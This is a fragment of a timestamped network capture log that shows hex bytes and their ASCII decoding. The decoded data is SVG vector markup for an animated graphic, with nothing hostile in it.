                                                                                                                                                                              Data Ascii: s 1 normal none running;"></path><path class="cls-38 svg-anim" d="M808.85,281.77a1.85,1.85,0,0,1,.11-.31c-.31.67-1,1-1.09,1.78a11,11,0,0,0-.15,1.15c0,.44.2.62.31,1,.22.74-.17,1.75-1.07,1.45-.69-.23-1.1-1-1.6-1.45a11.76,11.76,0,0,1-1.89-1.77,2.39,2.39,0,0,
                                                                                                                                                                              2023-09-15 05:28:20 UTC7027INData Raw: 35 2e 36 36 20 35 39 38 2e 34 35 20 32 32 31 2e 37 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 32 22 20 70 6f 69 6e 74 73 3d 22 35 37 39 2e 35 34 20 32 31 31 2e 31 32 20 35 39 32 2e 36 35 20 32 31 36 2e 32 33 20 35 39 39 2e 32 20 32 32 30 2e 32 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 32 22 20 70 6f 69 6e 74 73 3d 22 35 37 37 2e 38 32 20 32 33 35 2e 32 32 20 35 39 30 2e 35 20 32 33 39 2e 35 34 20 35 39 37 2e 38 31 20 32 33 36 2e 33 37 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 33 22 20 70 6f 69 6e 74 73 3d 22 35 37 37 2e 38 32 20 32 35 30 2e 33 31 20 35 39 30 2e 35 20 32
                                                                                                                                                                              Data Ascii: 5.66 598.45 221.7"></polyline><polyline class="cls-52" points="579.54 211.12 592.65 216.23 599.2 220.2"></polyline><polyline class="cls-52" points="577.82 235.22 590.5 239.54 597.81 236.37"></polyline><polyline class="cls-53" points="577.82 250.31 590.5 2
                                                                                                                                                                              2023-09-15 05:28:20 UTC7043INData Raw: 61 6e 69 6d 22 20 64 3d 22 4d 36 30 39 2e 33 33 2c 33 30 34 2e 38 39 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 30 2c 2e 32 2d 2e 32 38 63 2d 2e 34 2e 36 37 2d 2e 33 31 2c 31 2e 34 38 2d 2e 39 2c 32 61 39 2e 39 34 2c 39 2e 39 34 2c 30 2c 30 2c 31 2d 2e 39 32 2e 38 63 2d 2e 33 38 2e 32 37 2d 2e 36 35 2e 32 2d 31 2c 2e 33 33 2d 2e 37 38 2e 32 35 2d 31 2e 34 33 2c 31 2e 31 37 2d 2e 36 34 2c 31 2e 37 38 61 35 2e 31 38 2c 35 2e 31 38 2c 30 2c 30 2c 30 2c 32 2e 32 31 2e 35 34 2c 31 32 2e 31 31 2c 31 32 2e 31 31 2c 30 2c 30 2c 30 2c 32 2e 36 35 2e 36 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 30 2c 31 2e 34 35 2d 2e 35 35 63 2e 34 35 2d 2e 34 38 2e 32 38 2d 31 2e 35 37 2e 32 34 2d 32 2e 31 36 2d 2e 30 36 2d 31 2d 2e 34 33 2d 31 2e 39 32 2d 2e 34 31 2d 32 2e
                                                                                                                                                                              Data Ascii: anim" d="M609.33,304.89a1.62,1.62,0,0,0,.2-.28c-.4.67-.31,1.48-.9,2a9.94,9.94,0,0,1-.92.8c-.38.27-.65.2-1,.33-.78.25-1.43,1.17-.64,1.78a5.18,5.18,0,0,0,2.21.54,12.11,12.11,0,0,0,2.65.6,2.52,2.52,0,0,0,1.45-.55c.45-.48.28-1.57.24-2.16-.06-1-.43-1.92-.41-2.
                                                                                                                                                                              2023-09-15 05:28:20 UTC7059INData Raw: 30 2c 30 2d 2e 35 32 2d 2e 30 36 2c 31 2e 35 34 2c 31 2e 35 34 2c 30 2c 30 2c 30 2d 2e 37 2e 31 35 2c 31 2e 34 33 2c 31 2e 34 33 2c 30 2c 30 2c 30 2d 2e 35 2e 34 31 2c 31 2e 37 37 2c 31 2e 37 37 2c 30 2c 30 2c 30 2d 2e 33 2e 35 38 2c 32 2e 36 31 2c 32 2e 36 31 2c 30 2c 30 2c 30 2d 2e 30 39 2e 36 39 76 33 68 2d 31 2e 31 33 56 37 31 2e 31 36 43 38 39 34 2e 34 39 2c 37 31 2c 38 39 34 2e 34 39 2c 37 30 2e 38 31 2c 38 39 34 2e 34 38 2c 37 30 2e 35 37 5a 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 20 64 3d 22 4d 39 30 30 2e 31 35 2c 36 37 2e 38 38 61 2e 36 37 2e 36 37 2c 30 2c 30 2c 31 2d 2e 32 32 2e 35 32 2e 37 32 2e 37 32 2c 30 2c 30 2c 31 2d 2e 35 33 2e 32 2e 36 38 2e 36 38 2c 30 2c 30 2c 31 2d 2e 35 32 2d 2e 32 31 2e
                                                                                                                                                                              Data Ascii: 0,0-.52-.06,1.54,1.54,0,0,0-.7.15,1.43,1.43,0,0,0-.5.41,1.77,1.77,0,0,0-.3.58,2.61,2.61,0,0,0-.09.69v3h-1.13V71.16C894.49,71,894.49,70.81,894.48,70.57Z"></path><path class="cls-2" d="M900.15,67.88a.67.67,0,0,1-.22.52.72.72,0,0,1-.53.2.68.68,0,0,1-.52-.21.
                                                                                                                                                                              2023-09-15 05:28:20 UTC7075INData Raw: 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 30 30 2e 31 31 2c 32 30 31 2e 37 32 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 41 32 2e 35 33 2c 32 2e 35 33 2c 30 2c 30 2c 31 2c 36 39 36 2c 32 30 33 61 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d
                                                                                                                                                                              Data Ascii: 51-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.86"></path><path class="cls-4" d="M700.11,201.72a1.73,1.73,0,0,1-.78,2.24A2.53,2.53,0,0,1,696,203a2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"></path><path class="cls-4" d="M
                                                                                                                                                                              2023-09-15 05:28:20 UTC7091INData Raw: 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 33 31 2e 35 37 2c 32 39 37 2e 38 34 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 33 31 2e 33 34 2c 32 39 30 2e 39 31 61 31 2e 37
                                                                                                                                                                              Data Ascii: 0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path><path class="cls-4" d="M731.57,297.84a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.39,2.39,0,0,1,.52-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M731.34,290.91a1.7
                                                                                                                                                                              2023-09-15 05:28:20 UTC7123INData Raw: 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 34 39 2e 34 32 2c 32 30 30 2e 30 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 34 39 2e 31 39 2c 31 39 33 2e 31 32 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d
                                                                                                                                                                              Data Ascii: th><path class="cls-4" d="M749.42,200.06a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.11,2.11,0,0,1,.16,2.85"></path><path class="cls-4" d="M749.19,193.12a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-
                                                                                                                                                                              2023-09-15 05:28:20 UTC7139INData Raw: 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38 30 2e 36 35 2c 32 38 39 2e 32 34 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32
                                                                                                                                                                              Data Ascii: ,1.72,0,0,1-.78,2.23,2.5,2.5,0,0,1-3.33-.94,2.37,2.37,0,0,1,.51-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M780.65,289.24a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2
                                                                                                                                                                              2023-09-15 05:28:20 UTC7155INData Raw: 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 39 38 2e 35 2c 31 39 31 2e 34 35 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68
                                                                                                                                                                              Data Ascii: .34-.94,2.41,2.41,0,0,1,.52-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"></path><path class="cls-4" d="M798.5,191.45a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path
                                                                                                                                                                              2023-09-15 05:28:20 UTC7171INData Raw: 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 30 2c 32 38 37 2e 35 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 32 39 2e 37 32 2c 32 38 30 2e 36 33 61 31 2e 37 32 2c 31 2e 37
                                                                                                                                                                              Data Ascii: 0,1,2.89,0,2.11,2.11,0,0,1,.16,2.86"></path><path class="cls-4" d="M830,287.57a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"></path><path class="cls-4" d="M829.72,280.63a1.72,1.7
                                                                                                                                                                              2023-09-15 05:28:20 UTC7187INData Raw: 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 37 2e 38 31 2c 31 38 39 2e 37 39 41 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2c 38 34 37 2c 31 39 32 61 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 37 2e 35 37 2c 31 38 32 2e 38 35 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 31
                                                                                                                                                                              Data Ascii: 0,1,.16,2.86"></path><path class="cls-4" d="M847.81,189.79A1.72,1.72,0,0,1,847,192a2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"></path><path class="cls-4" d="M847.57,182.85a1.73,1.73,0,0,1-.78,2.24,2.51
                                                                                                                                                                              2023-09-15 05:28:20 UTC7203INData Raw: 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 32 37 2c 32 38 35 2e 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2c 32 37 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35
                                                                                                                                                                              Data Ascii: s="cls-4" d="M879.27,285.9a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"></path><path class="cls-4" d="M879,279a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.5
                                                                                                                                                                              2023-09-15 05:28:20 UTC7219INData Raw: 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 39 36 2e 38 38 2c 31 38 31 2e 31 38 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30
                                                                                                                                                                              Data Ascii: 0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"></path><path class="cls-4" d="M896.88,181.18a1.72,1.72,0,0,1-.78,2.24,2.51,2.51,0,0,1-3.33-.94,2.39,2.39,0,0,1,.51-2.89,2.24,2.24,0,0,1,2.89,0
                                                                                                                                                                              2023-09-15 05:28:20 UTC7235INData Raw: 2d 33 2e 33 34 2d 31 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 38 2e 33 35 2c 32 37 37 2e 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70
                                                                                                                                                                              Data Ascii: -3.34-1,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M928.35,277.3a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"></path><p
                                                                                                                                                                              2023-09-15 05:28:20 UTC7251INData Raw: 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 33 38 2e 32 31 2c 32 39 33 2e 32 34 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 33 38 2e 34 34 2c 33 30 30 2e 30 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37
                                                                                                                                                                              Data Ascii: 0,0,1-.16-2.82"></path><path class="cls-4" d="M1038.21,293.24a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M1038.44,300.07a1.7,1.7,0,0,1,.77-2.2,2.47
                                                                                                                                                                              2023-09-15 05:28:20 UTC7267INData Raw: 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 30 37 2e 34 35 2c 32 30 35 2e 34 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 30 37 2e 36 39 2c 32 31 32 2e 32 34 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d
                                                                                                                                                                              Data Ascii: cls-4" d="M1007.45,205.41a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"></path><path class="cls-4" d="M1007.69,212.24a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-
                                                                                                                                                                              2023-09-15 05:28:20 UTC7283INData Raw: 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 37 36 2e 39 33 2c 31 32 34 2e 34 32 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 37 37 2e 31 36 2c 31 33 31 2e 32 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34
                                                                                                                                                                              Data Ascii: .08,0,0,1-.15-2.81"></path><path class="cls-4" d="M976.93,124.42a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.38,2.38,0,0,1-.51,2.85,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M977.16,131.24a1.7,1.7,0,0,1,.77-2.2,2.4
                                                                                                                                                                              2023-09-15 05:28:20 UTC7299INData Raw: 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 39 2e 38 32 2c 32 33 34 2e 33 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d
                                                                                                                                                                              Data Ascii: -.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M959.82,234.37a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M
